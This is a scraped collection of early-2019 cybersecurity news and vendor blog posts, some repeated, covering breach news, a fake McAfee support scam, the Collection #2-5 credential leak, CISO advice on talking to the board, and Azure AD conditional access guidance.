  • The United Arab Emirates has gathered a group of hackers to track adversaries of their government. Many of the members are former U.S. National Security Agency hackers. 
  • A group of 2.2 billion login credentials is circulating among hacking groups. This trove of information is part of a smaller collection that was uncovered by a security researcher earlier this year.
  • A distributed denial-of-service attack recently broke the record for packets sent per second. Security firm Imperva says they recently stopped an attack against their client that crossed the 500 million packets per second mark. 
  • Airbus employees’ data was accessed as the result of a recent data breach. The airline says there was no impact to their commercial operations or intellectual property.
  • Chrome and Firefox fixed several security flaws in the latest versions of their browsers. Chrome 72 fixed 58 CVEs, including one that was rated “critical,” while Firefox patched seven CVEs, including three “critical” ones. 

Defending critical infrastructure is imperative

The Cybersecurity Tech Accords upcoming webinar and the importance of public-private partnership

Today, cyberattacks from increasingly sophisticated actors threaten organizations across every sector, and whether a Fortune 500 company or a local bakery, organizations of all sizes need to take steps to limit the dangers posed by these threats. This is the core of cybersecurity risk managementunderstanding potential threats and actively working to mitigate them. But while organizations large and small should protect themselves against such threats, the owners and operators of critical infrastructure have a unique additional obligation to understand risks and improve their cyber resilience in the interests of the communities, and even whole societies, that rely on their industries.

Critical Infrastructure refers to the industries and institutions whose continued operation is necessary for the security and stability of a society. Energy, water, and healthcare sectors are often deemed critical infrastructure, as are essential government organizations, transportation sectors, and even entire elections systems. The organizations that own and operate this infrastructure have a responsibility to keep it up and, running in the face of any challenge, require even more careful attention to security, particularly cybersecurity.

It is with this responsibility in mind that we are excited for the upcoming webinar from the senior malware researcher at the IT security firm, ESET, on the latest and most potent cyberthreats to critical infrastructure. The webinar is free to attend and will be hosted by the Cybersecurity Tech Accord on February 4, 2019.

As a signatory to the Cybersecurity Tech Accord, Microsoft is glad to see this diverse coalition of technology companies taking time to address this important issue and highlight the most significant cyberthreats to critical infrastructure. These are the types of challenges that the tech industry should be working collaboratively to address. In fact, Microsoft recently published a white paper titled Risk Management for Cybersecurity: Security Baselines on how policies can improve critical infrastructure protection by establishing outcome-focused security baselines. Such policies mandate how secure critical infrastructure systems must be while allowing industry to innovate and evolve their approaches as necessary to achieve those goals.

Critical infrastructure protection requires cooperation between the public and private sectors because, while the resilience of these sectors is a national security priority, the critical infrastructure itself is most often owned and operated by private industry and dependent on the technologies that are developed and maintained by private companies. In this dynamic, governments play an indispensable role in identifying security needs and standards for success, while industry understands its own technology and how to best meet security objectives.

The benefits of this collaboration are highlighted in the recently published report by the Organization of American States (OAS), developed in partnership with Microsoft, Critical Infrastructure Protection in Latin America and the Caribbean 2018. The report is a tremendous resource for policymakers in the region, as OAS was able to acutely identify the cybersecurity priorities and challenges of its Latin American and the Caribbean member states, while Microsoft was able to provide technical insights on how to best enable critical infrastructure owners and operators to protect their systems based on those priorities.

The upcoming webinar from ESET will doubtlessly shed additional light on the ever-changing nature of cybersecurity threats, especially as they relate to critical infrastructure, further underscoring the importance of cooperative relationships between sectors moving forward. We invite you to attend the live event; and for those who cannot attend on February 4, 2019, the webinar will be recorded and made available on the Cybersecurity Tech Accord website in the days that follow.

For a full list of upcoming webinars, and to access previous sessions on demand, visit the Cybersecurity Tech Accord website.

The post Defending critical infrastructure is imperative appeared first on Microsoft Secure.

Microsoft Secure: Defending critical infrastructure is imperative

The Cybersecurity Tech Accords upcoming webinar and the importance of public-private partnership

Today, cyberattacks from increasingly sophisticated actors threaten organizations across every sector, and whether a Fortune 500 company or a local bakery, organizations of all sizes need to take steps to limit the dangers posed by these threats. This is the core of cybersecurity risk managementunderstanding potential threats and actively working to mitigate them. But while organizations large and small should protect themselves against such threats, the owners and operators of critical infrastructure have a unique additional obligation to understand risks and improve their cyber resilience in the interests of the communities, and even whole societies, that rely on their industries.

Critical Infrastructure refers to the industries and institutions whose continued operation is necessary for the security and stability of a society. Energy, water, and healthcare sectors are often deemed critical infrastructure, as are essential government organizations, transportation sectors, and even entire elections systems. The organizations that own and operate this infrastructure have a responsibility to keep it up and, running in the face of any challenge, require even more careful attention to security, particularly cybersecurity.

It is with this responsibility in mind that we are excited for the upcoming webinar from the senior malware researcher at the IT security firm, ESET, on the latest and most potent cyberthreats to critical infrastructure. The webinar is free to attend and will be hosted by the Cybersecurity Tech Accord on February 4, 2019.

As a signatory to the Cybersecurity Tech Accord, Microsoft is glad to see this diverse coalition of technology companies taking time to address this important issue and highlight the most significant cyberthreats to critical infrastructure. These are the types of challenges that the tech industry should be working collaboratively to address. In fact, Microsoft recently published a white paper titled Risk Management for Cybersecurity: Security Baselines on how policies can improve critical infrastructure protection by establishing outcome-focused security baselines. Such policies mandate how secure critical infrastructure systems must be while allowing industry to innovate and evolve their approaches as necessary to achieve those goals.

Critical infrastructure protection requires cooperation between the public and private sectors because, while the resilience of these sectors is a national security priority, the critical infrastructure itself is most often owned and operated by private industry and dependent on the technologies that are developed and maintained by private companies. In this dynamic, governments play an indispensable role in identifying security needs and standards for success, while industry understands its own technology and how to best meet security objectives.

The benefits of this collaboration are highlighted in the recently published report by the Organization of American States (OAS), developed in partnership with Microsoft, Critical Infrastructure Protection in Latin America and the Caribbean 2018. The report is a tremendous resource for policymakers in the region, as OAS was able to acutely identify the cybersecurity priorities and challenges of its Latin American and the Caribbean member states, while Microsoft was able to provide technical insights on how to best enable critical infrastructure owners and operators to protect their systems based on those priorities.

The upcoming webinar from ESET will doubtlessly shed additional light on the ever-changing nature of cybersecurity threats, especially as they relate to critical infrastructure, further underscoring the importance of cooperative relationships between sectors moving forward. We invite you to attend the live event; and for those who cannot attend on February 4, 2019, the webinar will be recorded and made available on the Cybersecurity Tech Accord website in the days that follow.

For a full list of upcoming webinars, and to access previous sessions on demand, visit the Cybersecurity Tech Accord website.

The post Defending critical infrastructure is imperative appeared first on Microsoft Secure.



Microsoft Secure

Customer Support Scams Are Popping up in Social Media Ads: How to Stay Secure

Many of us rely on customer support websites for navigating new technology. Whether it’s installing a new piece of software or troubleshooting a computer program, we look to customer support to save the day. Unfortunately, cybercriminals are leveraging our reliance on customer support pages to access our personal information for financial gain. It appears that a malicious website is attempting to trick users into handing over their McAfee activation keys and personally identifiable information (PII) data by disguising themselves as the official McAfee customer support website.

So how exactly does this cyberthreat work? First, malicious actors advertise the fake website on Twitter. If a user clicks on the ad, they are presented with a “Download McAfee” button. When the user clicks on the download button, they are redirected to a screen prompting them to enter their name, email address, contact number, and product activation key to proceed with the download. However, when the user clicks on the “Start Download” button, they are redirected to a screen stating that their download failed due to an unexpected error.

 

At this point, the site owner has received the user’s personal data, which they could exploit in a variety of ways. And while this scheme may seem tricky to spot, there are a number of ways users can defend themselves from similar scams:

  • Be vigilant when clicking on social media links. Although it may be tempting to click on advertisements on your social media feed, these ads could possibly house sketchy websites developed by cybercriminals. Use caution when interacting with social media ads.
  • Go straight to the source. If you come across an advertisement claiming to be from a company and the link asks for personal data, it’s best to go directly to the company’s website instead. Use the official McAfee customer support page if you require technical support or assistance with your McAfee product.
  • Use security software. A security solution like McAfee WebAdvisor can help you spot suspicious websites and protect you from accidentally clicking on malicious links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Customer Support Scams Are Popping up in Social Media Ads: How to Stay Secure appeared first on McAfee Blogs.

McAfee Blogs: Customer Support Scams Are Popping up in Social Media Ads: How to Stay Secure

Many of us rely on customer support websites for navigating new technology. Whether it’s installing a new piece of software or troubleshooting a computer program, we look to customer support to save the day. Unfortunately, cybercriminals are leveraging our reliance on customer support pages to access our personal information for financial gain. It appears that a malicious website is attempting to trick users into handing over their McAfee activation keys and personally identifiable information (PII) data by disguising themselves as the official McAfee customer support website.

So how exactly does this cyberthreat work? First, malicious actors advertise the fake website on Twitter. If a user clicks on the ad, they are presented with a “Download McAfee” button. When the user clicks on the download button, they are redirected to a screen prompting them to enter their name, email address, contact number, and product activation key to proceed with the download. However, when the user clicks on the “Start Download” button, they are redirected to a screen stating that their download failed due to an unexpected error.

 

At this point, the site owner has received the user’s personal data, which they could exploit in a variety of ways. And while this scheme may seem tricky to spot, there are a number of ways users can defend themselves from similar scams:

  • Be vigilant when clicking on social media links. Although it may be tempting to click on advertisements on your social media feed, these ads could possibly house sketchy websites developed by cybercriminals. Use caution when interacting with social media ads.
  • Go straight to the source. If you come across an advertisement claiming to be from a company and the link asks for personal data, it’s best to go directly to the company’s website instead. Use the official McAfee customer support page if you require technical support or assistance with your McAfee product.
  • Use security software. A security solution like McAfee WebAdvisor can help you spot suspicious websites and protect you from accidentally clicking on malicious links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Customer Support Scams Are Popping up in Social Media Ads: How to Stay Secure appeared first on McAfee Blogs.



McAfee Blogs

This Week in Security News: Hacker Strategies and Spyware Attacks

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how hackers are improving their breach strategies. Also, learn about new spyware attacks via URLs, websites, and mobile apps.

Read on: 

Informing Your Security Posture: How Cybercriminals Blend into the Background

Maintaining protection over an enterprise’s critical data, systems and assets is a continual uphill battle. Hackers are bolstering their capabilities to silently breach platforms and staying under the radar.

Trend Micro: Cybersecurity Staff Feel Unsupported By Businesses

In a global survey of 1,125 IT executives, Trend Micro discovered that enterprise cybersecurity staff feels unsupported by their enterprises, with 33 percent feeling isolated in their positions.

What Enterprise Leaders Should know about Persistent Threats in 2019

As hackers continually shift and improve upon their attack and breach strategies, IT and security stakeholders must do their best to keep up and remain informed of these trends. 

Facebook Pays Teens to Install VPN That Spies on Them

Facebook has been secretly paying people to install a “Facebook Research” VPN that lets the company suck in all of a user’s phone and web activity.

ThinkPHP Vulnerability Abused by Botnets Hakai and Yowai

Cybercriminals use websites created using the PHP framework to breach web servers via dictionary attacks on default credentials and gain control of these routers for distributed denial of service attacks.  

Major iPhone FaceTime Bug Lets You Hear the Audio of the Person You Are Calling … Before They Pick Up

A bug has been discovered that lets you call anyone with FaceTime and immediately hear the audio coming from their phone — before the person on the other end has accepted or rejected the incoming call.

Various Google Play “Beauty Camera” Apps Sends Users Pornographic Content, Redirects Them to Phishing Websites and Collects Their Pictures

Trend Micro discovered several beauty camera apps on Google Play that are capable of accessing remote ad configuration servers that can be used for malicious purposes. 

Microsoft Exchange Vulnerability Enables Attackers to Gain Domain Admin Privileges

Microsoft Exchange 2013 and newer versions are vulnerable to a privilege escalation attack that gives anyone with a mailbox a way to gain domain administrator rights at potentially 90% of organizations running Active Directory and Exchange.

Zero-Day Vulnerability in Total Donations Plugin Could Expose WordPress Websites to Compromise

Owners and administrators of WordPress websites that use the “Total Donations” plugin are advised to remove the plugin after a zero-day vulnerability and design flaws were seen actively exploited. 

U.S. Judge Rejects Yahoo Data Breach Settlement

A U.S. judge rejected Yahoo’s proposed settlement with millions of people whose email addresses and other personal information were stolen in the largest data breach in history, faulting the Internet services provider for a lack of transparency.

Modified TeamViewer Tool Drops Trojan Spyware on Victims

On January 20, a security researcher going by FewAtoms spotted a malicious URL in the wild. The URL is an open directory that leads would-be victims to a malicious self-extracting archive. 

Which spyware attack were you most surprised to hear about? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Hacker Strategies and Spyware Attacks appeared first on .

More than 773M email addresses victim of largest data breach

Staggering 2.2 Billion Unique Records Compiled in The Largest Data Leak Ever

If you live in a developed country, or even in a developing country, your details are most likely included in this monster compilation of stolen data shared around by thousands of strangers.
A couple of weeks ago we reported that the details of at least 773 million people have surfaced on a free cloud storage service accessible by virtually everyone. With the staggering amount of data records, the data dump of stolen data named ‘Collection #1’ was quickly branded as the most extensive data leak in history by many.

Hours after cybersecurity researcher Troy Hunt announced the news about ‘Collection #1’, he said that he is in possession of four more collections named ‘collections #2-5’, and he was reviewing them. He said that he will be going through all the records and will be making a call on what to do with them soon. It turned out that he was not the only one in possession of the compilations of the stolen data information. Over the last couple weeks, the ‘collections #2-5’ has been shared between thousands of people as a part of a colossal 845GB torrent. The torrent has been downloaded thousands of times and currently has hundreds of seeders sharing the information with literally anyone in the world.

The ‘Collection #1’ data breach was taken off from the free cloud storage server as soon as the news about the leak become viral, but ‘collections #2-5’ which is virtually the biggest collection of stolen data information ever created, cannot really be taken down from torrent websites and will likely continue to be available for download for a very long time.

In the past, stolen data lists were offered on the Dark Web by cybercriminals for thousands of dollars. Currently, the biggest ever data leak with approximately 25 billion unique records and roughly 2.2 billion unique usernames and passwords, is freely available for download as a torrent.

Currently approximately 4 billion people in the world have access to the internet. With the latest data leak containing more than 2 billion unique emails and passwords, we can easily say that the personal information of half of the people who use the internet has been stolen by hackers and compiled into this mega-leak and is up for grabs for everyone interested. To put this into perspective, the records of almost every person living in the developed, and developing countries, are likely included in this large-sized torrent shared around by thousands of random strangers.

It is currently unknown if the ‘collections #2-5’ torrent contains just emails and passwords, or it includes sensitive information stolen from companies such as Equifax, which may include the social security numbers of almost every US citizen and permanent resident in the US. According to analysts from the Hasso Plattner Institute, a university located in eastern Germany, the megaleak is approximately three times bigger than the initial ‘largest data leak in the world’ announced couple weeks ago, and contains unprecedented amount of previously unseen stolen passwords.

As of right now, Troy Hunt, the researcher who brought the attention to ‘Collection #1’, has not yet uploaded the records from ‘collections #2-5’ to the ‘Have I Been Pwned’ website.
The records do not come from a single breach but are a compilation of tens and possibly hundreds data leaks that have happened over the years.

Why is this dangerous if the data is considered old?

What makes this leak particularly dangerous is the fact that the details of one-quarter of the population of planet Earth and more than half of all the people who have access to the internet are a click away from virtually anyone wanting to get a hold of it. If your email or personal information have been somehow stolen from any of the previously hacked technology conglomerates such as Dropbox, Yahoo, and LinkedIn, you most likely have already been notified and even forced to change your password.

However, according to cyber researchers, the records included in the new the latest data leak include many previously unseen passwords and usernames. And the torrent cannot be taken down which would allow less experienced hackers to start taking advantage of the information in those lists.

Everyone, from your work colleagues and neighbors to your friends and family, is now able to download the data and search through it. Literally, anyone can find any of your old passwords, investigate them and look for a pattern that might help them guess your current password. While passwords change, users generally do not change their email addresses often – spammers will be using the information to send unsolicited emails to billions of people for the years to come.

With a leak this big, the question is not if your details have been stolen in the past, but how many times have they been taken.

What actions should you take?

Unfortunately, this is just the beginning; the stolen data will now be accessed by thousands of people who will try to take advantage of it one way or another. If you haven’t changed your passwords over the last three months, we strongly encourage you to change them immediately. Don’t be tempted to use the same password over and over again, instead use a password manager that can save all passwords you have – most quality anti-virus software products come with integrated password management features.

Turn on the two-factor authentication wherever possible, and if you are a residing in the US, consider freezing your credit reports with all major credit bureaus – Equifax, TransUnion, and Experian.

Better safe than sorry!

Download your Antivirus

The post More than 773M email addresses victim of largest data breach appeared first on Panda Security Mediacenter.

Safeguarding your data from human error and phishing attacks with the cloud

This is the third article of a series, the first article is available here, and the second one is here. In a world of ransomware attacks, companies should prepare for the worst-case scenario by having smart backup strategies in place to mitigate any potential damage. The public cloud ensures that your information is always backed up and encrypted. Encrypting backup files in the cloud adds an extra layer of protection against unwelcome external parties. Unlike … More

The post Safeguarding your data from human error and phishing attacks with the cloud appeared first on Help Net Security.

Is your organization ready for the data explosion?

“Data is the new oil” and its quantity is growing at an exponential rate, with IDC forecasting a 50-fold increase from 2010 to 2020. In fact, by 2020, it’s estimated that new information generated each second for every human being will approximate to 1.7 megabytes. This creates bigger operational issues for organizations, with both NetOps and SecOps teams grappling to achieve superior performance, security, speed and network visibility. This delicate balancing act will become even … More

The post Is your organization ready for the data explosion? appeared first on Help Net Security.

Employees report 23,000 phishing incidents annually, costing $4.3 million to investigate

Account takeover-based (ATO) attacks now comprise 20 percent of advanced email attacks, according to Agari’s Q1 2019 Email Fraud & Identity Deception Trends report. ATO attacks are dangerous because they are more difficult to detect than traditional attacks – compromised accounts seem legitimate to email filters and end users alike because they are sent from a real sender’s email account. “Credential phishing was already a huge risk for organizations because of the potential for data … More

The post Employees report 23,000 phishing incidents annually, costing $4.3 million to investigate appeared first on Help Net Security.

Ten Years Strong: A Decade of Privacy and Cybersecurity Insights

In January 2019, Hunton Andrews Kurth celebrates the 10-year anniversary of our award-winning Privacy and Information Security Law Blog. Over the past decade, we have worked hard to provide timely, cutting-edge updates on the ever-evolving global privacy and cybersecurity legal landscape. Ten Years Strong: A Decade of Privacy and Cybersecurity Insights is a compilation of our blog’s top ten most read posts over the decade, and addresses some of the most transformative changes in the privacy and cybersecurity field.

Read Ten Years Strong: A Decade of Privacy and Cybersecurity Insights.

Microsoft Secure: CISO series: Talking cybersecurity with the board of directors

In todays threat landscape, boards of directors are more interested than ever before in their company’s cybersecurity strategy. If you want to maintain a boards confidence, you cant wait until after an attack to start talking to them about how you are securing the enterprise. You need to engage them in your strategy early and oftenwith the right level of technical detail, packaged in a way that gives the board exactly what they need to know, when they need to know it.

Cyberattacks have increased in frequency and size over the years, making cybersecurity as fundamental to the overall health of the business as financial and operational controls. Todays boards of directors know this, and they are asking their executive teams to provide more transparency on how their company manages cybersecurity risks. If you are a technology leader responsible for security, achieving your goals often includes building alignment with the board.

Bret Arsenault, corporate vice president and chief information security officer (CISO) for Microsoft, was a recent guest on our CISO Spotlight Series, where he shared several of his learnings on building a relationship with the board of directors. Weve distilled them down to the following three best practices:

  • Use the boards time effectively.
  • Keep the board educated on the state of cybersecurity.
  • Speak to the boards top concerns.

Use the boards time effectively

Members of your board come from a variety of different backgrounds, and they are responsible for all aspects of risk management for the business, not just security. Some board members may track the latest trends in security, but many wont. When its time to share your security update, you need to cut through all the other distractions and land your message. This means you will want to think almost as much about how you are going to share your information as what you are going to share, keeping in mind the following tips:

  • Be concise.
  • Avoid technical jargon.
  • Provide regular updates.

This doesnt mean you should dumb down your report or avoid important technical information. It means you need to adequately prepare. It may take several weeks to analyze internal security data, understand key trends, and distill it down to a 10-page report that can be presented in 30 to 60 minutes. Quarterly updates will help you learn what should be included in those 10 pages, and it will give you the opportunity to build on prior reports as the board gets more familiar with your strategy. No matter what, adequate planning can make a big difference in how your report is received.

Keep the board educated on the state of cybersecurity

Stories about security breaches get a lot of attention, and your board may hope you can prevent an attack from ever happening. A key aspect of your role is educating them on the reasons why no company will ever be 100 percent secure. The real differentiation is how effectively a company responds to and recovers from an inevitable incident.

You can also help your board understand the security landscape better with analysis of the latest security incidents and updates on cybersecurity regulations and legislation. Understanding these trends will help you align resources to best protect the company and stay compliant with regional security laws.

Speak to the boards top concerns

As you develop your content, keep in mind that the best way to get the boards attention is by aligning your messages to their top concerns. Many boards are focused on the following key questions:

  • How well is the company managing their risk posture?
  • What is the governance structure?
  • How is the company preparing for the future?

To address these questions, Bret sticks to the following talking points:

  • Technical debtAn ongoing analysis of legacy systems and technologies and their security vulnerabilities.
  • GovernanceAn accounting of how security practices and tools measure up against the security model the company is benchmarked against.
  • Accrued liabilityA strategy to future-proof the company to avoid additional debts and deficits.

When it comes to effectively working with the board and other executives across your organization, a CISO should focus on four primary functions: manage risk, oversee technical architecture, implement operational efficiency, and most importantly, enable the business. In the past, CISOs were completely focused on technical architecture. Good CISOs today, and those who want to be successful in the future, understand that they need to balance all four responsibilities.

Learn more

Be sure to check out the interview with Bret in Part 1 of the CISO Spotlight Series, Security is Everyones Business, to hear firsthand his recommendations for talking to the board. And in Part 2, Bret walks through how to talk about security attacks and risk management with the board.

The National Institute of Standards and Technology (NIST)Cybersecurity Framework is a great reference if you are searching for a benchmark model.

To read more blogs from the series, visit theCISO series page.

The post CISO series: Talking cybersecurity with the board of directors appeared first on Microsoft Secure.



Microsoft Secure

CISO series: Talking cybersecurity with the board of directors

In todays threat landscape, boards of directors are more interested than ever before in their company’s cybersecurity strategy. If you want to maintain a boards confidence, you cant wait until after an attack to start talking to them about how you are securing the enterprise. You need to engage them in your strategy early and oftenwith the right level of technical detail, packaged in a way that gives the board exactly what they need to know, when they need to know it.

Cyberattacks have increased in frequency and size over the years, making cybersecurity as fundamental to the overall health of the business as financial and operational controls. Todays boards of directors know this, and they are asking their executive teams to provide more transparency on how their company manages cybersecurity risks. If you are a technology leader responsible for security, achieving your goals often includes building alignment with the board.

Bret Arsenault, corporate vice president and chief information security officer (CISO) for Microsoft, was a recent guest on our CISO Spotlight Series, where he shared several of his learnings on building a relationship with the board of directors. Weve distilled them down to the following three best practices:

  • Use the boards time effectively.
  • Keep the board educated on the state of cybersecurity.
  • Speak to the boards top concerns.

Use the boards time effectively

Members of your board come from a variety of different backgrounds, and they are responsible for all aspects of risk management for the business, not just security. Some board members may track the latest trends in security, but many wont. When its time to share your security update, you need to cut through all the other distractions and land your message. This means you will want to think almost as much about how you are going to share your information as what you are going to share, keeping in mind the following tips:

  • Be concise.
  • Avoid technical jargon.
  • Provide regular updates.

This doesnt mean you should dumb down your report or avoid important technical information. It means you need to adequately prepare. It may take several weeks to analyze internal security data, understand key trends, and distill it down to a 10-page report that can be presented in 30 to 60 minutes. Quarterly updates will help you learn what should be included in those 10 pages, and it will give you the opportunity to build on prior reports as the board gets more familiar with your strategy. No matter what, adequate planning can make a big difference in how your report is received.

Keep the board educated on the state of cybersecurity

Stories about security breaches get a lot of attention, and your board may hope you can prevent an attack from ever happening. A key aspect of your role is educating them on the reasons why no company will ever be 100 percent secure. The real differentiation is how effectively a company responds to and recovers from an inevitable incident.

You can also help your board understand the security landscape better with analysis of the latest security incidents and updates on cybersecurity regulations and legislation. Understanding these trends will help you align resources to best protect the company and stay compliant with regional security laws.

Speak to the boards top concerns

As you develop your content, keep in mind that the best way to get the boards attention is by aligning your messages to their top concerns. Many boards are focused on the following key questions:

  • How well is the company managing their risk posture?
  • What is the governance structure?
  • How is the company preparing for the future?

To address these questions, Bret sticks to the following talking points:

  • Technical debtAn ongoing analysis of legacy systems and technologies and their security vulnerabilities.
  • GovernanceAn accounting of how security practices and tools measure up against the security model the company is benchmarked against.
  • Accrued liabilityA strategy to future-proof the company to avoid additional debts and deficits.

When it comes to effectively working with the board and other executives across your organization, a CISO should focus on four primary functions: manage risk, oversee technical architecture, implement operational efficiency, and most importantly, enable the business. In the past, CISOs were completely focused on technical architecture. Good CISOs today, and those who want to be successful in the future, understand that they need to balance all four responsibilities.

Learn more

Be sure to check out the interview with Bret in Part 1 of the CISO Spotlight Series, Security is Everyones Business, to hear firsthand his recommendations for talking to the board. And in Part 2, Bret walks through how to talk about security attacks and risk management with the board.

The National Institute of Standards and Technology (NIST)Cybersecurity Framework is a great reference if you are searching for a benchmark model.

To read more blogs from the series, visit theCISO series page.

The post CISO series: Talking cybersecurity with the board of directors appeared first on Microsoft Secure.

Radware Blog: Attackers Are Leveraging Automation

Cybercriminals are weaponizing automation and machine learning to create increasingly evasive attack vectors, and the internet of things (IoT) has proven to be the catalyst driving this trend. IoT is the birthplace of many of the new types of automated bots and malware. At the forefront are botnets, which are increasingly sophisticated, lethal and highly automated digitized […]

The post Attackers Are Leveraging Automation appeared first on Radware Blog.



Radware Blog

Taking ethical action in identity: 5 steps for better biometrics

Glance at your phone. Tap a screen. Secure access granted! This is the power of biometric identity at work. The convenience of unlocking your phone with a fingertip or your face is undeniable. But ethical issues abound in the biometrics field. The film Minority Report demonstrated one possible future, in terms of precise advertising targeting based on a face. But the Spielberg film also demonstrated some of the downsides of biometrics – the stunning lack … More

The post Taking ethical action in identity: 5 steps for better biometrics appeared first on Help Net Security.

eCommerce credit card fraud is nearly an inevitability

Riskified surveyed 5,000 US-based consumers aged 18 and older about their online shopping behaviors, experience with and prevalence of credit card fraud, repeat shopping likelihood and customer satisfaction to develop a full picture of how consumers react to a number of common shopping experiences. The results are worrisome for both consumers and merchants, as roughly half of respondents reported experience with credit card fraud and 30% had their purchase wrongly declined, with a corresponding negative … More

The post eCommerce credit card fraud is nearly an inevitability appeared first on Help Net Security.

Free training course material on network forensics for cybersecurity specialists

Based on current best practices, the training includes performance indicators and means that will help those who take it increase their operational skills of tackling cyber incidents. Network forensics is more important than ever, since more and more data is sent via networks and the internet. When there is a security incident, network forensics can help reduce the time needed to go from Detection to Containment – an essential step in any major security incident. … More

The post Free training course material on network forensics for cybersecurity specialists appeared first on Help Net Security.

Step 4. Set conditional access policies: top 10 actions to secure your environment

The Top 10 actions to secure your environment series outlines fundamental steps you can take with your investment in Microsoft 365 security solutions. In Step 4. Set conditional access policies, youll learn how to control access to your apps and corporate resources using conditional access policies, and how these policies can block legacy authentication methods and control access to SaaS apps.

In todays workplace, users can work from anywhere, on any device. Whether using a company-provided laptop at the office, working from home, traveling for business, or using a personal mobile phone, employees expect to seamlessly access what they need to get work done. While the need for productivity may not change with circumstances, the level of risk of each sign-in does. Not all devices, apps, or networks are equally secure, and hackers will exploit any vulnerability that will give them access to your users and resources. It is critical to safeguard your identities, but it is not enough. You also need flexible security policies that are responsive to conditions.

Set up Azure Active Directory (Azure AD) conditional access policies

Azure AD conditional access lets you apply security policies that are triggered automatically when certain conditions are met. You can block access if the data suggests the user has been compromised or if its highly unlikely that the user would sign in under those conditions. You can enforce additional authentication requirements when the system detects a medium risk based on the sign-in conditions (see “Sign-in risk” below).

We recommend that you apply polices that are appropriate for your organization for the following conditions:

  • Users and user groups: To reduce the risk that sensitive data is leaked, define which users or user groups can access which applications or resources, paying careful attention to sources of highly sensitive information such as human resources or financial data.
  • Sign-in risk: Azure AD machine learning algorithms evaluate every sign-in and give it a risk score of low, medium, or high depending on how likely it is that someone other than the legitimate owner of the account is attempting to sign in. Anyone with a medium risk should be challenged with Multi-Factor Authentication (MFA) at sign-in. If the sign-in is a high risk, access should be blocked. This condition requires Azure AD Identity Protection, which you can read about in Step 3. Protect your identities.
  • Location: A location can be risky if its in a country with limited security policies or if the wireless network is unsecure or simply because its not a location where the organization typically does business. You can modify access requirements for sign-ins from locations that are not on an IP safe list or that are risky for other reasons. Users accessing a service when they’re off the corporate network should be required to use MFA.
  • Device platform: For this condition, define a policy for each device platform that either blocks access, requires compliance with Microsoft Intune policies, or requires the device be domain joined.
  • Device state: Use this condition to define policies for unmanaged devices.
  • Client apps: Users can access many cloud apps using different app types such as web-based apps, mobile apps, or desktop apps. You can apply security policies if an access attempt is performed using a client app type that causes known issues, or you can require that only managed devices access certain app types.
  • Cloud apps: This condition specifies unique policies for sensitive apps. For example, you can require that HR apps like Workday are blocked if Azure AD detects a risky sign-in or if a user tries to access it with an unmanaged device.

When a condition is met, you can choose what policy Azure AD will enforce:

  • Require MFA to prove identity.
  • Change the actions the user can take in cloud apps.
  • Restrict access to sensitive data (for example: limit downloads or sharing functionality).
  • Require a password reset.
  • Block access.

Once set, these policies will apply automatically without any manual intervention (Figure 1).

Figure 1. Azure AD automatically applies the policies you set based on condition.

Block legacy authentication and control access to highly privileged accounts

Old apps that use a legacy authentication method, such as POP3, IMAP4, or SMTP clients, can increase your risk because they prevent Azure AD from doing an advanced security assessment and dont allow more modern forms of authentication, such as MFA. We recommend you use client application conditional access rules (Figure 2) to block these apps entirely.

Figure 2. Apply conditional access rules to block client apps using legacy authentication methods.

You can also use conditional access rules to reduce the risk that highly privileged accounts or service accounts are compromised. For example, if your HR system uses a service account to access the email account, you can make sure it can only run against the service from a specific IP at the appropriate time of day.

Enhance conditional access with Intune and Microsoft Cloud App Security

Azure AD integrates with Intune, so that conditional access policies can consider the Intune device state as part of the policy, letting you set access controls for devices that have old operating systems or other security vulnerabilities. You can also use conditional access in Intune to make sure that only apps managed by Intune can access corporate email or other Office 365 services. Azure AD will enforce these rules.

Cloud App Security Conditional Access App Control extends conditional access to your SaaS apps. You can block downloads from apps, limit activities in the app, monitor risky users, or block access to the app entirely.

Once you have policies in place, we recommend that you use the Azure AD What If tool to simulate possible sign-in scenarios that your users may confront. The What If tool allows you to select a user, the app that user is trying to access, and the conditions of that sign-in to see which policies will apply. (Figure 3.) This step will give you a better sense of how your policies will impact your users. You can also check what policies do not apply to a specific scenario.

One final precaution: Be sure to set up an exception group for each conditional access policy, so you dont lock yourself out.

Figure 3. The Azure AD What If tool gives you a better sense of how your policies will impact your users.

Learn more

Check back in a few weeks for our next blog post, Step 5. Set up mobile device management, where well dive into how to plan your Intune deployment and set up mobile device management as part of your Unified Endpoint Management strategy.

Get deployment help now

FastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. Get started at FastTrack for Microsoft 365.

Resources

The post Step 4. Set conditional access policies: top 10 actions to secure your environment appeared first on Microsoft Secure.

Microsoft Secure: Step 4. Set conditional access policies: top 10 actions to secure your environment

The Top 10 actions to secure your environment series outlines fundamental steps you can take with your investment in Microsoft 365 security solutions. In Step 4. Set conditional access policies, youll learn how to control access to your apps and corporate resources using conditional access policies, and how these policies can block legacy authentication methods and control access to SaaS apps.

In todays workplace, users can work from anywhere, on any device. Whether using a company-provided laptop at the office, working from home, traveling for business, or using a personal mobile phone, employees expect to seamlessly access what they need to get work done. While the need for productivity may not change with circumstances, the level of risk of each sign-in does. Not all devices, apps, or networks are equally secure, and hackers will exploit any vulnerability that will give them access to your users and resources. It is critical to safeguard your identities, but it is not enough. You also need flexible security policies that are responsive to conditions.

Set up Azure Active Directory (Azure AD) conditional access policies

Azure AD conditional access lets you apply security policies that are triggered automatically when certain conditions are met. You can block access if the data suggests the user has been compromised or if its highly unlikely that the user would sign in under those conditions. You can enforce additional authentication requirements when the system detects a medium risk based on the sign-in conditions (see “Sign-in risk” below).

We recommend that you apply polices that are appropriate for your organization for the following conditions:

  • Users and user groups: To reduce the risk that sensitive data is leaked, define which users or user groups can access which applications or resources, paying careful attention to sources of highly sensitive information such as human resources or financial data.
  • Sign-in risk: Azure AD machine learning algorithms evaluate every sign-in and give it a risk score of low, medium, or high depending on how likely it is that someone other than the legitimate owner of the account is attempting to sign in. Anyone with a medium risk should be challenged with Multi-Factor Authentication (MFA) at sign-in. If the sign-in is a high risk, access should be blocked. This condition requires Azure AD Identity Protection, which you can read about in Step 3. Protect your identities.
